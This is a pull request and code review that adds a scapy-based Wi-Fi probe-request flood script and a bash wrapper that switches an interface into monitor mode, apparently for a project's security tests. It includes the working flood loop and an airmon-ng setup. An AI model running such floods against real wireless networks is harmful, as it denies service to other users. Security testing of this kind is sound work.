### PR TITLE
Probe Request flood attack scripts

### PR DESCRIPTION
**Pull request by aravindraja93**
- Have created a new directory called "python_scripts" to store the python files.
- The attack bash script calls the python script which uses scapy to flood channel with PR request

### CODE REVIEW

**Review by govindsi — APPROVED** [review]

File: common/tests/security/python_scripts/flood_pr.py [hunk 1]
```diff
@@ -0,0 +1,49 @@
...
+# Combining the RadioTap and the DOT11 frames, the probe request packet is crafted
+# User input is used to stop the flooding currently
+
+pr_pkt = radiotap/dot11_frame
+
+try: 
+    while True:
+        sendp(pr_pkt,iface=interface)
+except KeyboardInterrupt:
+    print("Stopped transmetting fake ProbeRequest frames")
```
Comment (martin-tii) [inline common/tests/security/python_scripts/flood_pr.py:48]: typo

File: common/tests/security/pr_floodattack.sh [hunk 2]
```diff
@@ -0,0 +1,98 @@
...
+
+	_init_result
+	
+	if [ "$result" -eq "1" ]; then
+	
+		echo "Device already in monitor mode"
+	
+	else
+		airmon-ng check kill
+		airmon-ng start $interface
```
Comment (martin-tii) [inline common/tests/security/pr_floodattack.sh:31]: should we use airmon-ng here? 
or leave it more generic with `iwconfig`
@govindsi ??

**Review by martin-tii — COMMENTED** [review]
Only to check if we should go with` airmon-ng` or with `iwconfig`

File: common/tests/security/pr_floodattack.sh (hunk 2 above)
Comment (aravindraja93) [reply common/tests/security/pr_floodattack.sh]: Have changed to use the `iwconfig`

File: common/tests/security/python_scripts/flood_pr.py (hunk 1 above)
Comment (aravindraja93) [reply common/tests/security/python_scripts/flood_pr.py]: Fixed this and other typos

**Review by martin-tii — APPROVED** [review]

**Pull request merged**